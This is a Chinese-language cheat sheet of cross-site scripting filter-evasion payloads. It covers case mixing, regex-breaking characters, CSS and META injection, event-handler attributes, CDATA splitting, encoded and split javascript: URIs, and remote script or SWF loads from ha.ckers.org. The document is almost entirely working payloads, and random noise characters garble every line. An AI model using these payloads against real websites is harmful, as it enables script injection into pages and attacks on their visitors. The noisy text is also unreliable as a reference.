1. 改变字符大小写8 a9 ]# o$ i: x+ | m. o3 N" l8 ~
) u5 v6 s5 i6 ^9 Y3 Z' v, _) ^4 ` [
: ]" E1 g6 d4 g) t! l% i+ G1 _' Y" F5 X/ P+ v. G* M' T( ^2 F3 L, B S
<sCript>alert(‘d’)</scRipT>
! B- L; p& Z0 U. ?3 y8 m# c/ y! F) r/ l
+ X* j( s. P$ Q- ]* J& g0 P0 n2. 利用多加一些其它字符来规避Regular Expression的检查
% y! t0 T' B( T8 J2 {1 X! {6 l! @+ E6 z* B3 S. l8 O t! D
<<script>alert(‘c’)//<</script>
* `1 H6 ?0 R0 U1 P) `; |& m' d: }' N2 X% M" M; O; U w0 ~8 R
<SCRIPT a=">" SRC="t.js"></SCRIPT>
( t1 u: A' @0 E8 l6 Q: D& g
3 Z- o3 R' Q" m8 H <SCRIPT =">" SRC="t.js"></SCRIPT>* d0 F. w3 N& W0 P
) o M- @6 O9 U: c <SCRIPT a=">" ” SRC="t.js"></SCRIPT>
* z1 e; T( [3 ~9 d9 J" c9 l/ c' S! p2 h- ?5 f
<SCRIPT "a=’>’" SRC="t.js"></SCRIPT>
/ p) p) j; G( P
I$ m* D5 W; _9 D <SCRIPT a=`>` SRC="t.js"></SCRIPT>
7 G0 ~1 O( v3 {0 ^" j1 N$ \$ }% `1 l; G/ Q9 }
<SCRIPT a=">’>" SRC="t.js"></SCRIPT>
' G. G: B2 P6 B" m* k: p
7 b6 i% A& K/ V& @( F) K3. 以其它扩展名取代.js
0 N* p2 d! v8 i* C8 O& a- \. t, R1 {! U! b, P' y" t
<script src="bad.jpg"></script>9 y7 \+ ^! v1 f
+ U! P, i9 m* F& C4. 将Javascript写在CSS档里) Q3 b) |/ P4 B7 z; c
- ^3 m* o* _1 g" C; m7 c
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
, M8 c/ |8 x# e: Z3 Z, p" Q. O' A8 \. Y
+ v; M0 V5 p9 L& T. Z9 @ example:6 S1 `6 H* A. D9 b; R
% P: J( x& H( C* P7 q9 v$ H
body {
3 v# W$ Y# \1 ^0 g$ z u$ e" D# L; D/ }* v) ?8 V; p$ Y1 _ ]
background-image: url(‘javascript:alert("XSS");’)
* ^* v7 k) a/ R# P
$ P" N7 }8 n" o0 a4 |5 [$ ]) A }# Y' Y: o6 g* c+ h/ {+ m
: E$ Y! W; Q5 j# ]6 }5. 在script的tag里加入一些其它字符
8 q" ^1 L9 I5 E: b7 N* O% o$ w! d
) f! n+ M6 Z: A9 p <SCRIPT/SRC="t.js"></SCRIPT>
2 M( N) M( T: \. E' X
% M0 t( G+ H9 D6 V# x9 F% p5 a <SCRIPT/anyword SRC="t.js"></SCRIPT>$ @: K( r+ u+ q1 \
( T+ U, O0 i+ W3 Y9 W! g' ]6. 使用tab或是new line来规避
9 q- f: x6 u9 G! J( i. V: A# i
' Z& v" ?! C+ o <img src="jav ascr ipt:alert(‘XSS3′)">
+ h) J. u" o" {+ ^5 t H6 E
, f+ t/ d5 ~, a5 E& R7 s <img src="jav ascr ipt:alert(‘XSS3′)">
& b0 e" C3 B4 x7 R# h+ ~# B; k* i3 m M& c/ j) C
<IMG SRC="jav ascript:alert(‘XSS’);">
+ j p6 T6 h: Z* V# q8 k( q
" a9 j- U7 T8 ] u$ ]5 N -> tag
2 R9 v7 A: X0 J7 l9 Z, o! }$ y
- t! q6 e5 W1 h% f( s9 h, U -> new line( C: k7 m( G4 m- t$ T+ c( V
7 \, B, ]4 t0 M3 I% W7. 使用"\"来规避
4 ]# k5 O x4 N9 q# a7 v
2 i; l* f" M$ N6 w- C7 X <STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>
1 A5 q' C# e' u+ K- |; J, J
0 o9 n1 @) {8 m; c& Y <IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>
3 J! c( c) j6 @) o+ Q
4 H' R, o% I) d& x* G <IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">0 w# B" u3 U; M
& c# I6 U$ {0 b" D3 v <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">) \# | G2 H3 E1 v# r
5 n# i0 F5 h+ `* s& p+ o- C [
<A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>; v8 H9 J0 d/ S$ h. }: q
~% ^& H- m# N7 U/ r5 x/ W
8. 使用Hex encode来规避(也可能会把";"拿掉)0 H! D" V; R$ s6 A* s9 x9 ~ p
" V7 k9 [3 H! L' a& q$ F0 o7 R5 e/ w- e) c <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
+ I6 k* k3 _9 ]( [) l' c" V' i
' o9 v! G9 r+ k! M7 g! t* ^0 Y( ^ 原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">4 @3 o. o4 C }/ ?+ x, n) E. n
9 [8 a. j8 }. M' A <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">4 ^9 c2 r, V. ~
5 G; m3 X5 w1 U8 z A
原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
2 }1 U3 `, A0 V9 p. V
' I1 Q4 L* n* V2 h8 x5 ]9. script in HTML tag# {: r* U* l/ `2 S4 \" m
/ E, [" T& N* H <body onload=」alert(‘onload’)」>
$ o6 y. v" ?. i* X3 Z+ l
2 F- f+ [! r& e7 Q8 K* d onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload! M# }/ S: i3 s
. M% C+ m" Q# M% o: p% q
10. 在swf里含有xss的code
% p: O2 G! L! H/ Z3 E! c- N: i0 u: M) K
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>/ o; M+ j* P! O2 f$ i! Y' S
$ c2 { ~) b. m11. 利用CDATA将xss的code拆开,再组合起来。: T# p7 ~0 o; C- f0 x
[7 |1 Q7 D( M. [+ S& G0 e
<XML ID=I><X><C>3 S: E: y3 k5 T' t; t. O* r1 n
4 x: B0 i T+ r- V c2 B <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>" Q6 ~5 @4 i: i! {) u5 |& n$ m
& T3 {) X) n8 ~, J$ l4 q4 e# `
</C></X>- c! G) D2 l, |% C& N
/ ]) }2 L4 z/ ^, S: N. ? p7 C </xml>
) y5 `* @4 [% V4 U O( U. Y1 E: w. D! ^4 A
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>+ W: p: m% ]6 m( ]" z2 ^ a
! t! H- M3 h' {8 L2 X: {0 M <XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML> `: M) Q3 q+ J1 A
% j& y# x+ v* p+ N& K. [ <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
2 n1 J# o+ o+ r5 f. [ V/ Q& Q7 Z I2 [9 Y. Q
12. 利用HTML+TIME。9 ^% S, @4 ^9 ~* K
. l' Q- ~* t) h. ]: u$ I9 \+ [$ | <HTML><BODY>
4 q3 A4 y9 q1 ^9 t; p& g8 k6 h4 {/ C" g/ A: u) G+ y8 @! i/ m
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">8 l7 m% ~% t q5 B
' R( C5 q7 [3 A1 _6 p
<?import namespace="t" implementation="#default#time2">
7 N5 n! B- A6 z- K; Z
& Y. t' h, m/ ^5 U2 K <t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">& {) o5 J' X* j
5 u( P. i* \3 `4 ~- H6 [, I$ N </BODY></HTML>
7 ~2 l! ?8 F; f1 o% I
9 V S. [4 u9 {% h6 J13. 透过META写入Cookie。# n, l; @4 D8 Q$ Y' t9 d, S6 G$ W
' Z8 ?& V: ]. y <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">7 I2 y2 K% _+ \% |# }! f% D
8 ^& L4 P- A# ^7 ^8 z9 w
14. javascript in src , href , url
+ K' K- } ~1 }4 h8 O0 B- [9 L1 I9 B I* n
<IFRAME SRC=javascript:alert(’13′)></IFRAME>
8 E' C$ R9 G6 Z; f
1 N& q5 w7 c8 D! Z/ H <img src="javascript:alert(‘XSS3′)">+ w. F2 B9 b$ }3 p% y/ p7 s% K+ P
6 B3 Y. r( q' |" `/ c6 Q: i7 Y
<IMG DYNSRC="javascript:alert(‘XSS20′)">
% E0 w% f" L) Z% y/ V
% K1 f" z* A7 D+ w) }0 @ <IMG LOWSRC="javascript:alert(‘XSS21′)">6 a: z+ q3 V: S% z
* ]* b2 |' W4 h
<LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">
9 r, q9 i. G4 A6 A! s a/ \+ l' j9 X( }' p1 {
<IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>
% m5 W. y. ~/ X4 ?9 B$ T& X9 k, X0 P0 U3 \3 S2 ?
<TABLE BACKGROUND="javascript:alert(‘XSS29′)">( E4 }- P, F" Z/ ~9 z
7 ?" T1 C# B& R* L1 j! ~. Y <DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">. L/ t s& X- X/ \# t
! x: V$ O3 `4 f7 j& D0 t% p' K% ~ <STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}/ [7 [! ~( @0 d6 o1 Y
$ \1 ? U7 G1 t# @
</STYLE><A CLASS=XSS></A>$ ]' O! `+ [0 R
' [/ _4 j* ?/ L: g, `) j1 j <FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>
" G2 V6 T. |4 e7 S3 R
) d1 f W1 L" [# Q" O0 I* v |